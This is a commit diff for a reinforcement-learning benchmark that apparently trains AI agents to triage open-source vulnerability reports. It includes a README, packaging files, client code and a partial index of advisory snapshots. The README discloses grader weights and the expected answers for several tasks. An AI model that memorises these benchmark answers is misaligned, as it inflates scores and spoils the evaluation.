Adhitya-Vardhan committed · Commit d63a1ba
Initial commit: VulnOps OpenEnv benchmark
- Deterministic multi-step vulnerability triage environment
- 4 tasks: easy → medium → hard difficulty ladder
- Typed Pydantic models, step/reset/state API
- Interactive tool use: search_nvd_database, fetch_commit_diff, message_maintainer
- Heuristic baseline scores 1.0 on all tasks
- FastAPI server ready for Hugging Face Spaces (port 7860)
- .dockerignore +33 -0
- .gitignore +52 -0
- Dockerfile +46 -0
- README.md +236 -0
- __init__.py +11 -0
- client.py +36 -0
- data/README.md +8 -0
- data/snapshot_index.json +1205 -0
- inference.py +313 -0
- models.py +144 -0
- openenv.yaml +6 -0
- pyproject.toml +29 -0
- scripts/build_snapshot_cache.py +139 -0
- scripts/compare_training_speeds.py +38 -0
- scripts/dump_mlx_generation.py +63 -0
- scripts/evaluate_lora.py +133 -0
- scripts/evaluate_mlx.py +137 -0
- scripts/generate_sft_data.py +116 -0
- scripts/prepare_mlx_data.py +145 -0
- scripts/run_lora_pipeline.py +135 -0
- scripts/run_mlx_benchmark.sh +29 -0
- scripts/run_mlx_training.py +147 -0
- scripts/save_mlx_speed.py +48 -0
- scripts/save_pytorch_baseline_speed.py +47 -0
- scripts/start_mlx_training.sh +13 -0
- scripts/train_lora_sft.py +261 -0
- server/Dockerfile +32 -0
- server/__init__.py +1 -0
- server/app.py +34 -0
- server/cases.py +742 -0
- server/graders.py +121 -0
- server/requirements.txt +1 -0
- server/vuln_triage_env_environment.py +315 -0
- tests/test_environment.py +220 -0
- uv.lock +0 -0
.dockerignore
ADDED
@@ -0,0 +1,33 @@
# --- .dockerignore for VulnOps ---
# Avoid copying source control and temp files
.git/
.github/
.vscode/
.DS_Store

# Avoid copying project-local environments or caches
.venv/
.pytest_cache/
__pycache__/
*.pyc

# Avoid copying large artifact directories
artifacts/
logs/
.gemini/

# Avoid copying build artifacts
dist/
build/
*.egg-info/

# Ignore documentation/markdown files not needed for runtime (except README)
problem-statement.md
project-ideas-final.md
implementation-plan.md
HANDOFF_NEXT_STEPS.md
training_utils.py  # User requested only "required" parts; training is separate.
client.py  # Environment logic is the core, client is for testing.
tests/  # Tests are for CI, not the production container.
scripts/  # Original scraping scripts are no longer needed for the benchmark.
uv.lock  # Builder uses it, but no need to copy into the final image if not used.
.gitignore
ADDED
@@ -0,0 +1,52 @@
# ---- Python ----
__pycache__/
*.py[cod]
*.pyo
*.pyd
.Python
*.egg-info/
dist/
build/
*.egg

# ---- Virtual environments ----
.venv/
venv/
env/

# ---- Testing / CI ----
.pytest_cache/
.coverage
htmlcov/

# ---- macOS ----
.DS_Store
*.DS_Store

# ---- IDE / editors ----
.vscode/
.idea/
*.swp
*.swo

# ---- Logs & artifacts ----
logs/
artifacts/
*.log

# ---- Planning & dev-only docs (not needed in submission) ----
problem-statement.md
project-ideas-final.md
implementation-plan.md
HANDOFF_NEXT_STEPS.md
probe_env.py
training_utils.py

# ---- Local AI tooling ----
.gemini/

# ---- Data snapshots (large, runtime-fetched) ----
data/snapshots/

# ---- uv lock (builder uses it but not needed in git for HF) ----
# Keep uv.lock — required for reproducible Docker builds
Dockerfile
ADDED
@@ -0,0 +1,46 @@
# --- Dockerfile for VulnOps Benchmark ---
FROM python:3.11-slim AS builder

ENV PYTHONDONTWRITEBYTECODE=1 \
    PYTHONUNBUFFERED=1 \
    PIP_NO_CACHE_DIR=1

WORKDIR /app

# Install uv for fast dependency management
RUN pip install --no-cache-dir uv

# Copy everything needed to build the module
COPY pyproject.toml uv.lock README.md ./
COPY server/ ./server/

# Install dependencies (without dev)
RUN uv sync --frozen --no-dev --no-editable

# --- Runtime Stage ---
FROM python:3.11-slim

WORKDIR /app

# Copy remaining files
COPY models.py inference.py probe_env.py ./
COPY server/ ./server/
COPY data/ ./data/

# Copy virtualenv from builder
COPY --from=builder /app/.venv /app/.venv
ENV PATH="/app/.venv/bin:$PATH"

# Create non-root user and set permissions for Hugging Face Spaces
RUN useradd -m -u 1000 user && \
    mkdir -p /tmp && \
    chown -R user:user /app /tmp

USER 1000

# Expose port (HF Spaces defaults to 7860)
EXPOSE 7860

# Default command: Start the environment server
# Use uvicorn to serve the VulnOps FastAPI application on port 7860
CMD ["python", "-m", "uvicorn", "server.app:app", "--host", "0.0.0.0", "--port", "7860"]
README.md
ADDED
@@ -0,0 +1,236 @@
---
title: VulnOps Reasoning Benchmark
emoji: 🛡️
colorFrom: blue
colorTo: indigo
sdk: docker
app_port: 7860
pinned: false
tags:
  - openenv
---

# VulnOps OpenEnv

`vulnops` is an OpenEnv benchmark for open-source vulnerability operations. The agent plays the role of a maintainer or security analyst working through incoming vulnerability cases, revealing supporting evidence, filling a structured draft, and submitting the correct next maintainer action.

This benchmark is intentionally not a bug-fixing environment and not a generic classifier. It models a real workflow: validating advisories, identifying affected packages and versions, weighing severity versus exploitability, and deciding whether to patch or publish an advisory.

## Data sources

The benchmark pulls case data from live public vulnerability feeds at runtime:

- OSV for package identity, advisory details, affected ranges, and references
- NVD for normalized CVE descriptions and CVSS severity metadata
- EPSS for exploitability scoring signals

The environment normalizes those live responses into hidden ground truth on `reset()`. To keep tests, local development, and offline execution stable, each task also includes a bundled fallback snapshot that is used when the APIs are unavailable.

In addition to the task-specific fallbacks, the container ships with a broader cache of 200 provider-backed fallback snapshots under `data/snapshots/`. That keeps the image self-sufficient and gives us room to expand the benchmark without depending entirely on live API availability.
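To make the live-first, snapshot-fallback behavior concrete, here is a minimal sketch of the OSV leg of that lookup. It is illustrative, not the environment's actual loader: `load_osv_case` is a hypothetical helper, and since the bundled snapshots are normalized, their JSON shape may differ from the raw API response. The URL is the public OSV API endpoint.

```python
import json
import urllib.request
from pathlib import Path


def load_osv_case(osv_id: str, snapshot_dir: Path = Path("data/snapshots")) -> dict:
    """Fetch an OSV advisory live, falling back to the bundled snapshot."""
    try:
        # Public OSV API endpoint for a single advisory.
        url = f"https://api.osv.dev/v1/vulns/{osv_id}"
        with urllib.request.urlopen(url, timeout=10) as resp:
            return json.load(resp)
    except Exception:
        # Offline, blocked, or rate-limited: fall back to the bundled
        # snapshot keyed by OSV advisory ID (see data/README.md).
        return json.loads((snapshot_dir / f"{osv_id}.json").read_text())
```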
## Why this is useful

- Real-world utility: OSS maintainers triage reports like these every week.
- Deterministic grading: each case has hidden ground truth and a reproducible scorer.
- Multi-step rewards: the agent earns signal for revealing good evidence and filling the draft correctly before final submission.
- Lightweight deployment: no VM, browser, or external datasets are required at runtime.

## Environment interface

The environment implements the standard OpenEnv APIs:

- `reset(task_id=...) -> VulnTriageObservation`
- `step(VulnTriageAction) -> VulnTriageObservation`
- `state -> VulnTriageState`

### Action space

`VulnTriageAction` has these fields:

- `action_type`: one of `read_report`, `inspect_evidence`, `search_nvd_database`, `fetch_commit_diff`, `message_maintainer`, `set_validity`, `set_affected_package`, `set_affected_versions`, `set_severity`, `set_exploitability`, `set_next_action`, `set_missing_information`, `request_more_info`, `submit_triage`
- `evidence_id`: used with `inspect_evidence`
- `value`: generic value for label-setting and missing-information actions
- `rationale`: optional free-form note

### Observation space

`VulnTriageObservation` returns:

- task metadata: `task_id`, `difficulty`, `objective`
- `report_summary`
- `visible_evidence`
- `available_evidence`
- `draft`
- `action_history`
- `steps_remaining`
- `score_breakdown`
- `final_score`
- standard OpenEnv fields: `reward`, `done`, `metadata`

A minimal rollout loop over these types is sketched below.
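The step/reset contract can be made concrete with a short episode loop against the typed client from `client.py`. This is a sketch under assumptions flagged in the comments: the importable package name, the `base_url` constructor argument (a common OpenEnv client pattern, not shown in this diff), and `reset()` returning the same `StepResult` wrapper as `step()`.

```python
# Assumption: the package import name; __init__.py re-exports both types.
from vulnops import VulnTriageAction, VulnTriageEnv

# Assumption: the EnvClient base class accepts the server's base URL.
env = VulnTriageEnv(base_url="http://localhost:8000")

# Assumption: reset() returns a StepResult like step(); reset(task_id=...)
# pins a specific case.
result = env.reset()
obs = result.observation
print(obs.objective, obs.steps_remaining)

# Illustrative (not score-maximizing) trajectory: read the report,
# fill one draft field, then submit.
for action in (
    VulnTriageAction(action_type="read_report"),
    VulnTriageAction(action_type="set_validity", value="valid"),
    VulnTriageAction(action_type="submit_triage"),
):
    result = env.step(action)
    print(result.reward, result.done)
    if result.done:
        break
```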
## Task ladder

### 1. GuardDog Path Traversal
- Difficulty: easy
- Goal: Validate the report, identify the package and fixed range, and choose `patch`.

### 2. Invenio Multi-Branch XSS
- Difficulty: medium
- Goal: Resolve affected versions across multiple release lines and extract truth despite decoy severity signals.

### 3. Requests Auth Header Leak
- Difficulty: medium
- Goal: Ignore severe threat-intel decoys and use `fetch_commit_diff` to read the Python fix manually.

### 4. Gradio Upload XSS
- Difficulty: hard
- Goal: Actively `message_maintainer` to discover the lack of a patch and avoid catastrophic penalties by choosing `request_info`.
## Baseline Scores

The benchmark includes a baseline evaluation script (`inference.py`). Tested against **Qwen3:30b** using the interactive action space:

- **Average Score (0-1.0):** `0.3104`
- **Reasoning Gap:** `68.96%`

*Frontier models struggle to proactively use tools (`search_nvd_database`, `fetch_commit_diff`, `message_maintainer`) rather than passively read, creating a large optimization valley for RL evaluation.*
## Reward design

Per-step reward is shaped to encourage realistic behavior:

- positive reward for reading the report, revealing new relevant evidence, and setting a draft field correctly
- negative reward for repeated evidence inspection, empty or incorrect updates, and premature or low-evidence submission
- final submission reward equals the normalized grader score in `[0.0, 1.0]`, with a small penalty for submitting with too little evidence

### Grader weights

Each draft field contributes its weight to the final grader score (a worked sketch follows this list):

- validity: `0.20`
- affected package: `0.10`
- affected versions: `0.10`
- severity: `0.20`
- exploitability: `0.15`
- next action: `0.15`
- missing-information handling: `0.10`
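A minimal sketch of how a weighted grader could combine per-field correctness into the final `[0.0, 1.0]` score. The weights come from the list above; the field names and the exact-match rule are assumptions, since the real logic lives in `server/graders.py` and may award partial credit.

```python
# Sketch of a weighted triage grader; field names are illustrative.
WEIGHTS = {
    "validity": 0.20,
    "affected_package": 0.10,
    "affected_versions": 0.10,
    "severity": 0.20,
    "exploitability": 0.15,
    "next_action": 0.15,
    "missing_information": 0.10,
}  # sums to 1.0, so the total is already normalized


def grade(draft: dict, truth: dict) -> float:
    """Score a submitted draft against hidden ground truth."""
    # Exact match per field is the simplest possible rule; the real grader
    # may use partial credit (e.g. for version ranges).
    return sum(
        weight * (draft.get(field) == truth.get(field))
        for field, weight in WEIGHTS.items()
    )


# Example: a draft correct on everything except severity and exploitability
# scores 1.0 - 0.20 - 0.15 = 0.65.
```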
## Project structure

```text
.
├── __init__.py
├── client.py
├── inference.py
├── models.py
├── openenv.yaml
├── pyproject.toml
└── server
    ├── app.py
    ├── cases.py
    ├── Dockerfile
    ├── graders.py
    └── vuln_triage_env_environment.py
```
## Setup

### Local Python setup

```bash
python -m pip install -e ".[dev]"
```

### Run the environment locally

```bash
uvicorn server.app:app --host 0.0.0.0 --port 8000
```

### Validate the environment

```bash
openenv validate .
```
## Inference baseline

The required root-level `inference.py` supports two modes:

- `--policy openai`: uses the OpenAI Python client, reading credentials from `OPENAI_API_KEY` or `HF_TOKEN`, the model name from `MODEL_NAME`, and an optional base URL from `API_BASE_URL`
- `--policy heuristic`: a deterministic offline smoke test for local development
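The configuration contract those bullets describe can be sketched as follows. This is not the actual `inference.py`; it only illustrates the environment-variable resolution order, and the `default_model` fallback name is a hypothetical placeholder.

```python
import os

from openai import OpenAI  # the OpenAI Python client named above


def build_client(default_model: str = "gpt-4o-mini") -> tuple[OpenAI, str]:
    """Resolve credentials, model, and base URL from the documented env vars."""
    api_key = os.environ.get("OPENAI_API_KEY") or os.environ.get("HF_TOKEN")
    if not api_key:
        raise SystemExit("Set OPENAI_API_KEY or HF_TOKEN")
    model = os.environ.get("MODEL_NAME", default_model)
    base_url = os.environ.get("API_BASE_URL")  # optional, e.g. an OpenAI-compatible router
    return OpenAI(api_key=api_key, base_url=base_url), model
```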
### Local direct benchmark run

```bash
python inference.py --policy heuristic
```

### Against a running local or remote server

```bash
export ENV_BASE_URL=http://localhost:8000
python inference.py --policy openai --model "$MODEL_NAME"
```

## Docker

Build and run:

```bash
docker build -t vulnops .
docker run -p 8000:7860 vulnops
```
## Hugging Face Space deployment

This project is packaged for a container-based FastAPI Space. The Space should be tagged with `openenv` and pointed at the provided `Dockerfile`.

## Expected baseline behavior

The heuristic policy should score `1.0` on all of the bundled fallback snapshots. The OpenAI baseline is intended as the hackathon submission baseline and should be reproducible with `temperature=0`.
## Local LoRA learnability check

This repo includes a local LoRA pipeline for a quick "is the environment learnable?" check with `Qwen/Qwen3.5-4B`.

On Apple Silicon, the recommended path is `MLX`, not the older PyTorch `MPS` path.

### What it does

- generates deterministic heuristic transitions from the environment
- expands them into prompt-variant SFT examples
- runs LoRA SFT with checkpointing
- evaluates the base model and the adapted model back on `vulnops`
- writes append-only logs so interrupted runs still leave useful evidence

### Install the training extra

```bash
python -m pip install -e ".[train]"
```

### Recommended MLX path

```bash
python -m pip install mlx mlx-lm
./scripts/start_mlx_training.sh
```

Artifacts are written under `artifacts/mlx_qwen3_4b/`:

- `run_manifest.json`: current status and latest known checkpoint
- `data/train.jsonl`: MLX-ready SFT records
- `logs/mlx_train.log`: main training log
- `logs/nohup.out`: launcher stdout/stderr
- `metrics/speed_mlx.json`: parsed speed summary
- `adapters/`: MLX adapter artifacts
- `training_summary.json`: final run status

If you stop the run midway, rerun `python scripts/run_mlx_training.py --model Qwen/Qwen3.5-4B --output-root artifacts/mlx_qwen3_4b`.
It will reuse the prepared dataset and resume from the saved adapter file when present.

### Current speed comparison

On this Mac, the saved local benchmark showed:

- PyTorch `MPS`: about `72.5 s/step`
- MLX: about `16.4 s/step`, roughly a 4.4x speedup

See [artifacts/speed_comparison.json](artifacts/speed_comparison.json).
__init__.py
ADDED
@@ -0,0 +1,11 @@
"""OpenEnv vulnerability triage environment package."""

from .client import VulnTriageEnv
from .models import VulnTriageAction, VulnTriageObservation, VulnTriageState

__all__ = [
    "VulnTriageAction",
    "VulnTriageEnv",
    "VulnTriageObservation",
    "VulnTriageState",
]
client.py
ADDED
@@ -0,0 +1,36 @@
"""Typed OpenEnv client for the vulnerability triage environment."""

from __future__ import annotations

from typing import Dict

from openenv.core import EnvClient
from openenv.core.client_types import StepResult

from .models import (
    EvidenceItem,
    TriageDraft,
    VulnTriageAction,
    VulnTriageObservation,
    VulnTriageState,
)


class VulnTriageEnv(
    EnvClient[VulnTriageAction, VulnTriageObservation, VulnTriageState]
):
    """Persistent typed client for the vulnerability triage benchmark."""

    def _step_payload(self, action: VulnTriageAction) -> Dict:
        return action.model_dump(exclude_none=True)

    def _parse_result(self, payload: Dict) -> StepResult[VulnTriageObservation]:
        observation = VulnTriageObservation.model_validate(payload.get("observation", {}))
        return StepResult(
            observation=observation,
            reward=payload.get("reward"),
            done=payload.get("done", False),
        )

    def _parse_state(self, payload: Dict) -> VulnTriageState:
        return VulnTriageState.model_validate(payload)
data/README.md
ADDED
@@ -0,0 +1,8 @@
# Snapshot Cache

This directory stores provider-backed fallback snapshots used when live OSV, NVD, or EPSS requests fail.

- `snapshots/*.json`: normalized raw provider snapshots keyed by OSV advisory ID
- `snapshot_index.json`: catalog of bundled snapshot files

The files are intended to be generated by `scripts/build_snapshot_cache.py`.
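The index that follows is a flat catalog, so a consumer can resolve an advisory to its bundled snapshot in a few lines. A minimal sketch, with the key names taken from `snapshot_index.json` below:

```python
import json
from pathlib import Path

# Load the catalog and build an OSV-ID -> snapshot-path lookup.
index = json.loads(Path("data/snapshot_index.json").read_text())
by_osv_id = {entry["osv_id"]: Path(entry["file"]) for entry in index["snapshots"]}

# e.g. the aiohttp advisory for CVE-2021-21330 listed in the index.
snapshot = json.loads(by_osv_id["PYSEC-2021-76"].read_text())
```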
data/snapshot_index.json
ADDED
@@ -0,0 +1,1205 @@
{
  "count": 200,
  "snapshots": [
    { "osv_id": "PYSEC-2013-1", "file": "data/snapshots/PYSEC-2013-1.json", "cve_id": "CVE-2013-4259", "package": "ansible" },
    { "osv_id": "PYSEC-2013-2", "file": "data/snapshots/PYSEC-2013-2.json", "cve_id": "CVE-2013-4260", "package": "ansible" },
    { "osv_id": "PYSEC-2014-98", "file": "data/snapshots/PYSEC-2014-98.json", "cve_id": "CVE-2014-2260", "package": "ajenti" },
    { "osv_id": "PYSEC-2014-99", "file": "data/snapshots/PYSEC-2014-99.json", "cve_id": "CVE-2014-4301", "package": "ajenti" },
    { "osv_id": "PYSEC-2015-1", "file": "data/snapshots/PYSEC-2015-1.json", "cve_id": "CVE-2015-3908", "package": "ansible" },
    { "osv_id": "PYSEC-2016-1", "file": "data/snapshots/PYSEC-2016-1.json", "cve_id": "CVE-2016-3096", "package": "ansible" },
    { "osv_id": "PYSEC-2017-105", "file": "data/snapshots/PYSEC-2017-105.json", "cve_id": "CVE-2016-8752", "package": "apache-atlas" },
    { "osv_id": "PYSEC-2017-106", "file": "data/snapshots/PYSEC-2017-106.json", "cve_id": "CVE-2017-3150", "package": "apache-atlas" },
    { "osv_id": "PYSEC-2017-107", "file": "data/snapshots/PYSEC-2017-107.json", "cve_id": "CVE-2017-3151", "package": "apache-atlas" },
    { "osv_id": "PYSEC-2017-108", "file": "data/snapshots/PYSEC-2017-108.json", "cve_id": "CVE-2017-3152", "package": "apache-atlas" },
    { "osv_id": "PYSEC-2017-109", "file": "data/snapshots/PYSEC-2017-109.json", "cve_id": "CVE-2017-3153", "package": "apache-atlas" },
    { "osv_id": "PYSEC-2017-110", "file": "data/snapshots/PYSEC-2017-110.json", "cve_id": "CVE-2017-3154", "package": "apache-atlas" },
    { "osv_id": "PYSEC-2017-111", "file": "data/snapshots/PYSEC-2017-111.json", "cve_id": "CVE-2017-3155", "package": "apache-atlas" },
    { "osv_id": "PYSEC-2017-2", "file": "data/snapshots/PYSEC-2017-2.json", "cve_id": "CVE-2014-3498", "package": "ansible" },
    { "osv_id": "PYSEC-2017-3", "file": "data/snapshots/PYSEC-2017-3.json", "cve_id": "CVE-2015-6240", "package": "ansible" },
    { "osv_id": "PYSEC-2017-4", "file": "data/snapshots/PYSEC-2017-4.json", "cve_id": "CVE-2017-7550", "package": "ansible" },
    { "osv_id": "PYSEC-2017-5", "file": "data/snapshots/PYSEC-2017-5.json", "cve_id": "CVE-2017-2809", "package": "ansible-vault" },
    { "osv_id": "PYSEC-2018-107", "file": "data/snapshots/PYSEC-2018-107.json", "cve_id": "CVE-2018-18548", "package": "ajenti" },
    { "osv_id": "PYSEC-2018-109", "file": "data/snapshots/PYSEC-2018-109.json", "cve_id": "CVE-2018-1000080", "package": "ajenti-panel" },
    { "osv_id": "PYSEC-2018-110", "file": "data/snapshots/PYSEC-2018-110.json", "cve_id": "CVE-2018-1000081", "package": "ajenti-panel" },
    { "osv_id": "PYSEC-2018-111", "file": "data/snapshots/PYSEC-2018-111.json", "cve_id": "CVE-2018-1000082", "package": "ajenti-panel" },
    { "osv_id": "PYSEC-2018-112", "file": "data/snapshots/PYSEC-2018-112.json", "cve_id": "CVE-2018-1000083", "package": "ajenti-panel" },
    { "osv_id": "PYSEC-2018-113", "file": "data/snapshots/PYSEC-2018-113.json", "cve_id": "CVE-2018-1000126", "package": "ajenti-panel" },
    { "osv_id": "PYSEC-2018-35", "file": "data/snapshots/PYSEC-2018-35.json", "cve_id": "CVE-2018-1000814", "package": "aiohttp-session" },
    { "osv_id": "PYSEC-2018-36", "file": "data/snapshots/PYSEC-2018-36.json", "cve_id": "CVE-2013-2233", "package": "ansible" },
    { "osv_id": "PYSEC-2018-37", "file": "data/snapshots/PYSEC-2018-37.json", "cve_id": "CVE-2016-8614", "package": "ansible" },
    { "osv_id": "PYSEC-2018-38", "file": "data/snapshots/PYSEC-2018-38.json", "cve_id": "CVE-2016-8628", "package": "ansible" },
    { "osv_id": "PYSEC-2018-39", "file": "data/snapshots/PYSEC-2018-39.json", "cve_id": "CVE-2016-9587", "package": "ansible" },
    { "osv_id": "PYSEC-2018-40", "file": "data/snapshots/PYSEC-2018-40.json", "cve_id": "CVE-2017-7466", "package": "ansible" },
    { "osv_id": "PYSEC-2018-41", "file": "data/snapshots/PYSEC-2018-41.json", "cve_id": "CVE-2017-7481", "package": "ansible" },
    { "osv_id": "PYSEC-2018-42", "file": "data/snapshots/PYSEC-2018-42.json", "cve_id": "CVE-2018-10855", "package": "ansible" },
    { "osv_id": "PYSEC-2018-43", "file": "data/snapshots/PYSEC-2018-43.json", "cve_id": "CVE-2018-10875", "package": "ansible" },
    { "osv_id": "PYSEC-2018-44", "file": "data/snapshots/PYSEC-2018-44.json", "cve_id": "CVE-2018-16837", "package": "ansible" },
    { "osv_id": "PYSEC-2018-45", "file": "data/snapshots/PYSEC-2018-45.json", "cve_id": "CVE-2017-12614", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2018-58", "file": "data/snapshots/PYSEC-2018-58.json", "cve_id": "CVE-2016-8647", "package": "ansible" },
    { "osv_id": "PYSEC-2018-60", "file": "data/snapshots/PYSEC-2018-60.json", "cve_id": "CVE-2018-16859", "package": "ansible" },
    { "osv_id": "PYSEC-2018-80", "file": "data/snapshots/PYSEC-2018-80.json", "cve_id": "CVE-2018-1000519", "package": "aiohttp-session" },
    { "osv_id": "PYSEC-2018-81", "file": "data/snapshots/PYSEC-2018-81.json", "cve_id": "CVE-2018-10874", "package": "ansible" },
    { "osv_id": "PYSEC-2019-1", "file": "data/snapshots/PYSEC-2019-1.json", "cve_id": "CVE-2019-1000007", "package": "aioxmpp" },
    { "osv_id": "PYSEC-2019-141", "file": "data/snapshots/PYSEC-2019-141.json", "cve_id": "CVE-2018-16876", "package": "ansible" },
    { "osv_id": "PYSEC-2019-142", "file": "data/snapshots/PYSEC-2019-142.json", "cve_id": "CVE-2018-20244", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-143", "file": "data/snapshots/PYSEC-2019-143.json", "cve_id": "CVE-2018-20245", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-145", "file": "data/snapshots/PYSEC-2019-145.json", "cve_id": "CVE-2019-10206", "package": "ansible" },
    { "osv_id": "PYSEC-2019-146", "file": "data/snapshots/PYSEC-2019-146.json", "cve_id": "CVE-2019-14856", "package": "ansible" },
    { "osv_id": "PYSEC-2019-147", "file": "data/snapshots/PYSEC-2019-147.json", "cve_id": "CVE-2017-15720", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-148", "file": "data/snapshots/PYSEC-2019-148.json", "cve_id": "CVE-2017-17835", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-149", "file": "data/snapshots/PYSEC-2019-149.json", "cve_id": "CVE-2017-17836", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-171", "file": "data/snapshots/PYSEC-2019-171.json", "cve_id": "CVE-2019-14858", "package": "ansible" },
    { "osv_id": "PYSEC-2019-2", "file": "data/snapshots/PYSEC-2019-2.json", "cve_id": "CVE-2019-10156", "package": "ansible" },
    { "osv_id": "PYSEC-2019-214", "file": "data/snapshots/PYSEC-2019-214.json", "cve_id": "CVE-2019-0216", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-215", "file": "data/snapshots/PYSEC-2019-215.json", "cve_id": "CVE-2019-0229", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-216", "file": "data/snapshots/PYSEC-2019-216.json", "cve_id": "CVE-2019-12417", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2019-3", "file": "data/snapshots/PYSEC-2019-3.json", "cve_id": "CVE-2019-10217", "package": "ansible" },
    { "osv_id": "PYSEC-2019-4", "file": "data/snapshots/PYSEC-2019-4.json", "cve_id": "CVE-2019-14846", "package": "ansible" },
    { "osv_id": "PYSEC-2019-5", "file": "data/snapshots/PYSEC-2019-5.json", "cve_id": "CVE-2019-3828", "package": "ansible" },
    { "osv_id": "PYSEC-2020-1", "file": "data/snapshots/PYSEC-2020-1.json", "cve_id": "CVE-2020-10685", "package": "ansible" },
    { "osv_id": "PYSEC-2020-10", "file": "data/snapshots/PYSEC-2020-10.json", "cve_id": "CVE-2020-1738", "package": "ansible" },
    { "osv_id": "PYSEC-2020-11", "file": "data/snapshots/PYSEC-2020-11.json", "cve_id": "CVE-2020-1739", "package": "ansible" },
    { "osv_id": "PYSEC-2020-12", "file": "data/snapshots/PYSEC-2020-12.json", "cve_id": "CVE-2020-1740", "package": "ansible" },
    { "osv_id": "PYSEC-2020-13", "file": "data/snapshots/PYSEC-2020-13.json", "cve_id": "CVE-2020-1746", "package": "ansible" },
    { "osv_id": "PYSEC-2020-14", "file": "data/snapshots/PYSEC-2020-14.json", "cve_id": "CVE-2020-11978", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-15", "file": "data/snapshots/PYSEC-2020-15.json", "cve_id": "CVE-2020-11981", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-159", "file": "data/snapshots/PYSEC-2020-159.json", "cve_id": "CVE-2020-26214", "package": "alerta-server" },
    { "osv_id": "PYSEC-2020-16", "file": "data/snapshots/PYSEC-2020-16.json", "cve_id": "CVE-2020-11982", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-160", "file": "data/snapshots/PYSEC-2020-160.json", "cve_id": "CVE-2019-14864", "package": "ansible" },
    { "osv_id": "PYSEC-2020-161", "file": "data/snapshots/PYSEC-2020-161.json", "cve_id": "CVE-2019-14904", "package": "ansible" },
    { "osv_id": "PYSEC-2020-162", "file": "data/snapshots/PYSEC-2020-162.json", "cve_id": "CVE-2019-12398", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-17", "file": "data/snapshots/PYSEC-2020-17.json", "cve_id": "CVE-2020-11983", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-18", "file": "data/snapshots/PYSEC-2020-18.json", "cve_id": "CVE-2020-13927", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-19", "file": "data/snapshots/PYSEC-2020-19.json", "cve_id": "CVE-2020-13944", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-198", "file": "data/snapshots/PYSEC-2020-198.json", "cve_id": "CVE-2014-2686", "package": "ansible" },
    { "osv_id": "PYSEC-2020-199", "file": "data/snapshots/PYSEC-2020-199.json", "cve_id": "CVE-2014-4657", "package": "ansible" },
    { "osv_id": "PYSEC-2020-2", "file": "data/snapshots/PYSEC-2020-2.json", "cve_id": "CVE-2020-10691", "package": "ansible" },
    { "osv_id": "PYSEC-2020-20", "file": "data/snapshots/PYSEC-2020-20.json", "cve_id": "CVE-2020-17513", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-200", "file": "data/snapshots/PYSEC-2020-200.json", "cve_id": "CVE-2014-4658", "package": "ansible" },
    { "osv_id": "PYSEC-2020-201", "file": "data/snapshots/PYSEC-2020-201.json", "cve_id": "CVE-2014-4659", "package": "ansible" },
    { "osv_id": "PYSEC-2020-202", "file": "data/snapshots/PYSEC-2020-202.json", "cve_id": "CVE-2014-4660", "package": "ansible" },
    { "osv_id": "PYSEC-2020-203", "file": "data/snapshots/PYSEC-2020-203.json", "cve_id": "CVE-2014-4678", "package": "ansible" },
    { "osv_id": "PYSEC-2020-204", "file": "data/snapshots/PYSEC-2020-204.json", "cve_id": "CVE-2014-4966", "package": "ansible" },
    { "osv_id": "PYSEC-2020-205", "file": "data/snapshots/PYSEC-2020-205.json", "cve_id": "CVE-2014-4967", "package": "ansible" },
    { "osv_id": "PYSEC-2020-206", "file": "data/snapshots/PYSEC-2020-206.json", "cve_id": "CVE-2019-14905", "package": "ansible" },
    { "osv_id": "PYSEC-2020-207", "file": "data/snapshots/PYSEC-2020-207.json", "cve_id": "CVE-2020-10684", "package": "ansible" },
    { "osv_id": "PYSEC-2020-208", "file": "data/snapshots/PYSEC-2020-208.json", "cve_id": "CVE-2020-10744", "package": "ansible" },
    { "osv_id": "PYSEC-2020-209", "file": "data/snapshots/PYSEC-2020-209.json", "cve_id": "CVE-2020-14365", "package": "ansible" },
    { "osv_id": "PYSEC-2020-21", "file": "data/snapshots/PYSEC-2020-21.json", "cve_id": "CVE-2020-17515", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-210", "file": "data/snapshots/PYSEC-2020-210.json", "cve_id": "CVE-2020-1753", "package": "ansible" },
    { "osv_id": "PYSEC-2020-22", "file": "data/snapshots/PYSEC-2020-22.json", "cve_id": "CVE-2020-17526", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-220", "file": "data/snapshots/PYSEC-2020-220.json", "cve_id": "CVE-2020-25635", "package": "ansible" },
    { "osv_id": "PYSEC-2020-221", "file": "data/snapshots/PYSEC-2020-221.json", "cve_id": null, "package": "ansible" },
    { "osv_id": "PYSEC-2020-23", "file": "data/snapshots/PYSEC-2020-23.json", "cve_id": "CVE-2020-9485", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-262", "file": "data/snapshots/PYSEC-2020-262.json", "cve_id": "CVE-2020-17511", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2020-3", "file": "data/snapshots/PYSEC-2020-3.json", "cve_id": "CVE-2020-14330", "package": "ansible" },
    { "osv_id": "PYSEC-2020-4", "file": "data/snapshots/PYSEC-2020-4.json", "cve_id": "CVE-2020-14332", "package": "ansible" },
    { "osv_id": "PYSEC-2020-5", "file": "data/snapshots/PYSEC-2020-5.json", "cve_id": "CVE-2020-1733", "package": "ansible" },
    { "osv_id": "PYSEC-2020-6", "file": "data/snapshots/PYSEC-2020-6.json", "cve_id": "CVE-2020-1734", "package": "ansible" },
    { "osv_id": "PYSEC-2020-7", "file": "data/snapshots/PYSEC-2020-7.json", "cve_id": "CVE-2020-1735", "package": "ansible" },
    { "osv_id": "PYSEC-2020-8", "file": "data/snapshots/PYSEC-2020-8.json", "cve_id": "CVE-2020-1736", "package": "ansible" },
